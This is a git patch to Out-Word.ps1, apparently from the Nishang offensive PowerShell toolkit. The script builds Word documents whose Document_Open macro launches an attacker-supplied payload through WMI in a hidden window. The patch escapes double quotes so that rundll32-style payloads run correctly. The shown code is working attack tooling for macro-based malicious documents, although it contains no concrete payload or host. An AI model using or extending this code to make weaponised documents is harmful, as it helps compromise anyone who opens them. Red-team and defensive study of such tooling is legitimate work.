From dc9e0be0ed6a6ba024ad91393127a00e99f13753 Mon Sep 17 00:00:00 2001
From: "Nikhil \"SamratAshok\" Mittal" <nikhil.uitrgpv@gmail.com>
Date: Sun, 9 Sep 2018 15:31:21 +0530
Subject: [PATCH] Minor changes to Out-Word to handle payloads

---
 Client/Out-Word.ps1 | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/Client/Out-Word.ps1 b/Client/Out-Word.ps1
index 38339a9..1852ace 100644
--- a/Client/Out-Word.ps1
+++ b/Client/Out-Word.ps1
@@ -309,14 +309,15 @@ https://github.com/samratashok/nishang
                 Set objConfig = objStartup.SpawnInstance_
                 objConfig.ShowWindow = HIDDEN_WINDOW
                 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
-                objProcess.Create $FinalPayload, Null, objConfig, intProcessID
+                objProcess.Create "$FinalPayload", Null, objConfig, intProcessID
              End Function
 "@
     }
     #If the payload is small in size, there is no need of multiline macro.
     else
     {
-        
+        # Escape double quotes. Useful for rundll32 payloads where double quotes are used. 
+        $FinalPayload = $Payload -replace '"','""'
         $code_one = @"
         Sub Document_Open()
         Execute
@@ -333,7 +334,7 @@ https://github.com/samratashok/nishang
                 Set objConfig = objStartup.SpawnInstance_
                 objConfig.ShowWindow = HIDDEN_WINDOW
                 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
-                objProcess.Create "$Payload", Null, objConfig, intProcessID
+                objProcess.Create "$FinalPayload", Null, objConfig, intProcessID
              End Function
 "@
     }